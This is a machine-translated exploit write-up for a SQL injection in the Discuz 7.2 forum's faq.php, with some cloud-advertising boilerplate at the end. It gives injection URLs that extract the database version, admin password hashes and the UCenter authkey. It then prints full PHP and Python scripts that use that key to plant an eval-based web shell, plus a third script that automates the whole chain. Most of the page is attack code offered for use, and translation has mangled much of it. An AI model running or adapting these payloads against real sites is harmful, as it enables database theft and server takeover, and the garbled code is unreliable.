Number No. 6.2 (possibly earlier) see this exp online, is a discuz 7.2 SQL injection Vulnerability
After a lot of textual research, most of the online exp in the existence of these or those problems, I use and revise the summary, using the following methods:
Discuz 7.2/faq.php SQL Injection Vulnerability
1. Get Database version information
Faq.php?action=grouppermission&gids[99]= ' &gids[100][0]=) and (select 1 from (SELECT COUNT (*), concat (Version ( ), Floor (rand (0) *)) x from Information_schema
. Tables GROUP by X) a)%23
2. Get the Administrator account password
faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (SELECT COUNT (*), concat ( Select (select Concat (Username,0x27,password) from cdb_members limit 1)) from ' information_schema '. Tables limit 0 , 1), Floor (rand (0) *)) x from Information_schema.tables Group by X) a)%23
to get rid of the last 1.
Such as:
http://xxxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20 (select%201%20from%20 ( Select%20count (*), Concat ((Select%20 (select%20 (select%20concat) Username,0x27,password 20limit%201)%20)%20from%20 ' Information_schema '. tables%20limit%200,1), Floor (rand (0) *)) X%20from%20information_ schema.tables%20group%20by%20x) a)%23
Return:
Error:duplicate entry ' admin ' f426eaa50a5c805d360ca4046419c6ba1 ' for key ' Group_key '
The cipher is f426eaa50a5c805d360ca4046419c6ba.
3. Get key
Faq.php?action=grouppermission&gids[99]= ' &gids[100][0]=) and (select 1 from (SELECT COUNT (*), concat ( Rand (0), 0x3a, (select substr (authkey,1,62) from cdb_uc_applications limit 0,1), 0x3a) x from Information_ Schema.tables GROUP by X) a)%23
Faq.php?action=grouppermission&gids[99]= ' &gids[100][0]=) and (select 1 from (SELECT COUNT (*), concat ( Rand (0), 0x3a, (select substr (authkey,63,64) from cdb_uc_applications limit 0,1), 0x3a) x from Information_ Schema.tables GROUP by X) a)%23
we need to be aware
Due to the length limit of authkey, can only be 62 units of length, and because can not modify the exp content (can not be Bauku after modification), so take the method obtained twice, first to obtain the first 62 bits, after obtaining 2 bits
Such as
http://xxxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20 (select%201%20from%20 ( Select%20count (*), concat (Floor (rand (0)), 0x3a, (Select%20substr (authkey,1,62)%20from%20cdb_uc_applications% 20limit%200,1), 0x3a) x%20from%20information_schema.tables%20group%20by%20x) a)%23
Return:
Error:duplicate entry ' 1:c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2se ' for key ' Group_key '
http://xxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20 (select%201%20from%20 ( Select%20count (*), concat (Floor (rand (0)), 0x3a, (Select%20substr (authkey,63,64)%20from%20cdb_uc_applications% 20limit%200,1), 0x3a) x%20from%20information_schema.tables%20group%20by%20x) a)%23
Return:
Error:duplicate entry ' 1:o6: ' for key ' Group_key '
The last key is "c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2se" + "o6" = C7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2seo6
After obtaining the hash and key I would like to refer to the use of key Getshell method, but a look is X2 x2.5 x3 Exploit, a total of two versions of the
PHP version
<?php//code Copyright belongs to the original author all! $timestamp = time () +10*3600; $host = "127.0.0.1"; $uc _key= "EAPF15K8B334BC8EBEY4GFN1VBQEA0N5WAOFQ6J285CA33I151E551G0L9F2L3DD"; $code =urlencode (_authcode ("Time= $timestamp &action=updateapps", ' ENCODE ', $uc _key)); $cmd 1= ' <?xml version= "1.0" encoding= "iso-8859-1"?><root> <item id= "Uc_api" >http://xxx\ '); Eval ($_ Post[dom]);//</item></root> '; $cmd 2= ' <?xml version= "1.0" encoding= "iso-8859-1"?><root> <item id= "Uc_api" >http://aaa</item ></root> '; $html 1 = Send ($cmd 1); echo $html 1; $html 2 = Send ($cmd 2); echo $html 2; function Send ($cmd) {global $host, $code; $message = "post/api/uc.php?code=". $code. " Http/1.1\r\n "; $message. = "Accept: */*\r\n"; $message. = "Referer:". $host. " \ r \ n "; $message. = "accept-language:zh-cn\r\n"; $message. = "content-type:application/x-www-form-urlencoded\r\n"; $message. = "user-agent:mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1;SV1) \ r \ n "; $message. = "Host:". $host. " \ r \ n "; $message. = "Content-length:". strlen ($cmd). " \ r \ n "; $message. = "connection:close\r\n\r\n"; $message. = $cmd; Var_dump ($message); $fp = Fsockopen ($host, 80); Fputs ($fp, $message); $resp = "; while ($fp &&!feof ($fp)) $resp. = Fread ($fp, 1024); return $RESP;} function _authcode ($string, $operation = ' DECODE ', $key = ', $expiry = 0) {$ckey _length = 4; $key = MD5 ($key? $key: Uc_key); $keya = MD5 (substr ($key, 0, 16)); $KEYB = MD5 (substr ($key, 16, 16)); $KEYC = $ckey _length? ($operation = = ' DECODE '? substr ($string, 0, $ckey _length): substr (MD5 (Microtime ()),-$ckey _length)): "; $cryptkey = $keya. MD5 ($keya. $KEYC); $key _length = strlen ($cryptkey); $string = $operation = = = ' DECODE '? Base64_decode (substr ($string, $ckey _length)): sprintf ('%010d ', $expiry? $expiry + Time (): 0). substr (MD5 ($string. $keyb ), 0, (+). $string; $string _length = strlen ($string); $result = ''; $box = Range (0, 255); $rndkey = Array (); for ($i = 0; $i <= 255; $i + +) {$rndkey [$i] = Ord ($cryptkey [$i% $key _length]); } for ($j = $i = 0; $i <, $i + +) {$j = ($j + $box [$i] + $rndkey [$i])% 256; $tmp = $box [$i]; $box [$i] = $box [$j]; $box [$j] = $tmp; } for ($a = $j = $i = 0; $i < $string _length; $i + +) {$a = ($a + 1)% 256; $j = ($j + $box [$a])% 256; $tmp = $box [$a]; $box [$a] = $box [$j]; $box [$j] = $tmp; $result. = Chr (ord ($string [$i]) ^ ($box [($box [$a] + $box [$j])% 256])); if ($operation = = ' DECODE ') {if (substr ($result, 0, ten) = = 0 | | substr ($result, 0,)-time () > 0) & & Substr ($result, ten, +) = = substr (MD5 ($result, $keyb), 0, +) {return substr ($result, 26); } else {return '; }} else {return $KEYC. Str_replace (' = ', ' ', Base64_encode ($result)); }}?>
#! /usr/bin/env python#coding=utf-8import hashlibimport timeimport mathimport base64import urllibimport urllib2import sys def microtime (get_as_float = False): If Get_as_float:return time.time () Else:return '%.8f%d '% mat H.MODF (Time.time ()) def get_authcode (string, key = "): Ckey_length = 4 key = HASHLIB.MD5 (key). Hexdigest () Keya = HASHLIB.MD5 (Key[0:16]). Hexdigest () keyb = HASHLIB.MD5 (key[16:32]). Hexdigest () Keyc = (Hashlib.md5 (Microtime ()). Hexd Igest ()) [-ckey_length:] #keyc = (hashlib.md5 (' 0.736000 1389448306 '). Hexdigest ()) [-ckey_length:] Cryptkey = Keya + ha SHLIB.MD5 (KEYA+KEYC). Hexdigest () key_length = Len (cryptkey) string = ' 0000000000 ' + (HASHLIB.MD5 (string+keyb)). Hexd Igest () [0:16]+string string_length = Len (string) result = ' box = Range ' (0,) Rndkey = Dict () for I in R Ange (0,256): rndkey[i] = ord (cryptkey[i% key_length]) j=0 for I in Range (0,256): j = (j + box[i] + rn Dkey[i])%p = box[i] box[i] = box[j] box[j] = tmp a=0 j=0 for I in Range (0,string_length): a = (A + 1) % of J = (j + box[a])% TMP = Box[a] box[a] = box[j] box[j] = tmp result + = Chr (o RD (String[i]) ^ (box[(Box[a] + box[j])) return KEYC + base64.b64encode (result). replace (' = ', ') def get_shell (U Rl,key,host): ' Send command to get Webshell ' headers={' accept-language ': ' ZH-CN ', ' content-type ': ' application/x-www- Form-urlencoded ', ' user-agent ': ' Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ', ' Referer ': url} tm = Time.time () +10*3600 tm= "Time=%d&action=updateapps"%TM code = urllib.quote ( Get_authcode (Tm,key)) url=url+ "? code=" +code data1= "" <?xml version= "1.0" encoding= "iso-8859-1"?> &L t;root> <item id= "Uc_api" >http://xxx\ '); eval ($_post[1]);//</item> </root> ' Try:req=urllib2. Request (Url,data=data1,headers=heaDERs) Ret=urllib2.urlopen (req) except:return "Access error" data2= "<?xml version=" 1.0 "encoding=" ISO-885 9-1 "?> <root> <item id=" Uc_api ">http://aaa</item> </root>" Try:req=urllib2. Request (url,data=data2,headers=headers) ret=urllib2.urlopen (req) except:return "error" return "Webshe LL: "+host+"/config/config_ucenter.php,password:1 "if __name__ = = ' __main__ ': host=sys.argv[1] key=sys.argv[2] url =host+ "/api/uc.php" Print Get_shell (url,key,host)
How to use:
Python uckey.py Http://www.localhost.com/uckey |
But found that seems unable to kill 7.2,getshell and did not succeed, do not know why, but also ask you to teach more.
Finally attached "Pony" exp, but the effect is not ideal, roughly away from ibid, but seemingly can not Getshell
<?php/** * @author: Xiaoma * @blog: www.i0day.com * @date: 2014.7.2 23:1 */error_reporting (0); Set_time_limit (3000 ); $host = $argv [1]; $path = $argv [2]; $js = $argv [3]; $timestamp = time () +10*3600; $table = "cdb_";//Table name if ($ARGC < 2) {Print_ R (' ******************************************************** * Discuz faq.php SQL Injection EXP * * ---------By:Www.i0day.com-----------* * usage:php '. $argv [0]. ' URL 1 * *----- --------------------------------* JS option: 1.GetShell 2. Take the password 3. Check the table prefix * * * * php '. $argv [0]. ' WWW.I0DAY.COM/1 * php '. $argv [0]. ' WWW.I0DAY.COM/DZ72/1 * * * * * ******************************************************** '); Exit;} if ($js ==1) {$sql = "action=grouppermission&gids[99]= ' &gids[100][0]=)%20and%20 (select%201%20from%20 (Select%20count (*), concat (Floor (rand (0)), 0X3A3A, (Select%20length (Authkey)%20from%20 ". $table." uc_applications%20limit%200,1), 0x3a3a) x%20from%20information_schema.tables%20group%20by%20x) a)%23 "; $resp = Sendpack ($host, $path, $sql); if (Strpos ($resp, "::") ==-1) {echo ' table prefix may not be the default cdb_ please look at the table prefix first! '; }else{Preg_match ("/::(. *)::/", $RESP, $matches); $lenght =intval ($matches [1]); if ($lenght) {if ($lenght <=124) {$sql = "action=grouppermission&gids[99]= ' &gids[100][0]=)%20and%2 0 (Select%201%20from%20 (select%20count (*), concat (rand (0), 0x5E, (Select%20substr (authkey,1,62)%20from%20 ". $table." uc_applications%20limit%200,1)) x%20from%20information_schema.tables%20group%20by%20x) a)%23 "; $resp = Sendpack ($host, $path, $sql); if (Strpos ($resp, "1\^")!=-1) {Preg_match ("/1\^ (. *) \ ' U", $resp, $key 1); $sql = "Action=grouppermission&gids[99]= ' &gids[100][0]=)%20and%20 (select%201%20from%20 (Select%20count (*), concat (Floor (rand (0)), 0x5E, (Select%20substr (Authkey, 63,62)%20from%20 ". $table." uc_applications%20limit%200,1)) x%20from%20information_schema.tables%20group%20by%20x) a)%23 "; $resp = Sendpack ($host, $path, $sql); Preg_match ("/1\^ (. *) \ ' U", $resp, $key 2); $key = $key 1[1]. $key 2[1]; $code =urlencode (_authcode ("Time= $timestamp &action=updateapps", ' ENCODE ', $key)); $cmd 1= ' <?xml version= "1.0" encoding= "iso-8859-1"?><root> <item id= "Uc_api" >bbs.49you.com\ '); eval ($_post[i0day]);//</item></root> '; $cmd 2= ' <?xml version= "1.0" encoding= "iso-8859-1"?><root> <item id= "Uc_api" >bbs.49you.com</ Item></root> '; $html 1 = Send ($cmd 1); $res 1=substr ($html 1,-1); $html 2 = Send ($cmd 2); $res 2=substr ($html 1,-1); if ($res 1== ' 1 ' && $res 2== ' 1 ') {echo ' Shell address:/http '. $host. $path. ' config.inc.php pass:i0day '; }}else{Echo ' Get failed '; }}}}}elseif ($js ==2) {$sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%2 0%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5e5e5e,username,0x3a,password , 0x3a,salt%29%20from%20 ". $table." uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5e%29x%20from%20information_schema.tables%20group%20by% 20x%29a%29%23 "; $resp = Sendpack ($host, $path, $sql); if (Strpos ($resp, "\^\^\^")!=-1) {Preg_match ("/\^\^\^ (. *) \^/u", $resp, $password); echo ' Password: '. $password [1]; }else{echo ' table prefix may not be the default cdb_ please look at the table prefix first! '; }}elseif ($js ==3) {$sql = "action=grouppermission&gids[99]= ' &gids[100][0]=)%20and%20 (select%201%20from%20 ( Select%20count (*), concat (Floor (rand (0)), 0x5E, (Select%20hex (table_name)%20from%20information_schema.tables% 20where%20table_schema=database ()%20limit%201,1), 0x5E) x20from%20information_schema%20.tables%20group%20by%20x) a)%23 "; $resp = Sendpack ($host, $path, $sql); if (Strpos ($resp, "1\^")!=-1) {Preg_match ("/1\^ (. *) \^/u", $resp, $t); if (Strpos ($t [1], "cdb_")!=-1) {echo "table name is:". HEX2STR ($t [1]). "Table prefix is default cdb_ no modification required"; }else{echo "Table name:". HEX2STR ($t [1]). ' is not the default table name Cdb_ please modify the $table ' in the code yourself; }}else{echo "View table prefix failed, Sorry"; }}else{echo "Script not selected",} function Sendpack ($host, $path, $sql, $js) {$data = "GET". $path. " /faq.php? ". $sql. " Http/1.1\r\n "; $data. = "Host:". $host. " \ r \ n "; $data. = "user-agent:mozilla/5.0 (Windows NT 5.1; rv:20.0) gecko/20100101 firefox/20.0\r\n"; $data. = "connection:close\r\n\r\n"; $data. = $html. " \ r \ n "; $ock =fsockopen ($host, 80); if (! $ock) {echo "No response from". $host; Die (); } fwrite ($ock, $data); $resp = "; while (!feof ($ock)) {$resp. =fread ($ock, 1024); } return $RESP; }function Send ($cmd) {global $host, $code, $path; $message = "POST". $path. " /api/uc.php?code= ". $code." Http/1.1\r\n "; $message. = "Accept: */*\r\n"; $message. = "Referer:". $host. " \ r \ n "; $message. = "accept-language:zh-cn\r\n"; $message. = "content-type:application/x-www-form-urlencoded\r\n"; $message. = "user-agent:mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) \ r \ n "; $message. = "Host:". $host. " \ r \ n "; $message. = "Content-length:". strlen ($cmd). " \ r \ n "; $message. = "connection:close\r\n\r\n"; $message. = $cmd; Var_dump ($message); $fp = Fsockopen ($host, 80); Fputs ($fp, $message); $resp = "; while ($fp &&!feof ($fp)) $resp. = Fread ($fp, 1024); return $RESP;} function _authcode ($string, $operation = ' DECODE ', $key = ', $expiry = 0) {$ckey _length = 4; $key = MD5 ($key? $key: Uc_key); $keya = MD5 (substr ($key, 0, 16)); $KEYB = MD5 (substr ($key, 16, 16)); $KEYC = $ckey _lengTh? ($operation = = ' DECODE '? substr ($string, 0, $ckey _length): substr (MD5 (Microtime ()),-$ckey _length)): "; $cryptkey = $keya. MD5 ($keya. $KEYC); $key _length = strlen ($cryptkey); $string = $operation = = = ' DECODE '? Base64_decode (substr ($string, $ckey _length)): sprintf ('%010d ', $expiry? $expiry + Time (): 0). substr (MD5 ($string. $keyb ), 0, (+). $string; $string _length = strlen ($string); $result = "; $box = Range (0, 255); $rndkey = Array (); for ($i = 0; $i <= 255; $i + +) {$rndkey [$i] = Ord ($cryptkey [$i% $key _length]); } for ($j = $i = 0; $i <, $i + +) {$j = ($j + $box [$i] + $rndkey [$i])% 256; $tmp = $box [$i]; $box [$i] = $box [$j]; $box [$j] = $tmp; } for ($a = $j = $i = 0; $i < $string _length; $i + +) {$a = ($a + 1)% 256; $j = ($j + $box [$a])% 256; $tmp = $box [$a]; $box [$a] = $box [$j]; $box [$j] = $tmp; $result. = Chr (ord ($string [$i]) ^ ($box [($box [$a] + $box [$J]) (% 256])); if ($operation = = ' DECODE ') {if (substr ($result, 0, ten) = = 0 | | substr ($result, 0,)-time () > 0) & & Substr ($result, ten, +) = = substr (MD5 ($result, $keyb), 0, +) {return substr ($result, 26); } else {return '; }} else {return $KEYC. Str_replace (' = ', ' ', Base64_encode ($result)); }}function Hex2str ($hex) {$str = '; $arr = Str_split ($hex, 2); foreach ($arr as $bit) {$str. = Chr (Hexdec ($bit)); } return $STR; }?>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
